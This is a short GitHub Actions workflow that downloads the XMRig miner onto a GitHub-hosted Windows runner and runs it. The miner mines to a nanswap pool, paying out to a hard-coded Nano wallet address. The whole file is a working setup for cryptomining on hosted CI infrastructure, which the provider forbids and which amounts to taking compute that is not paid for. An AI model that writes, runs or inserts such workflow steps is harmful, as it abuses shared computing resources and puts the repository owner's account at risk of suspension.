name: Run XMRig Task

on:
  workflow_dispatch:

jobs:
  run-xmrig:
    runs-on: windows-latest
    steps:
      - name: Download XMRig
        shell: powershell
        run: |
          $url = "https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-msvc-win64.zip"
          Invoke-WebRequest -Uri $url -OutFile "xmrig.zip"
          Expand-Archive -Path "xmrig.zip" -DestinationPath "."

      - name: Execute Mining Script
        shell: cmd
        run: |
          cd xmrig-6.21.0
          xmrig.exe -o xmrig.nanswap.com:3333 -a rx -k -u nano_3d5psf65d41ckxdnqz5ajuwo1ceo6hq8k4q314oa78doqozye9b6eb5iqpc1 -p x
          
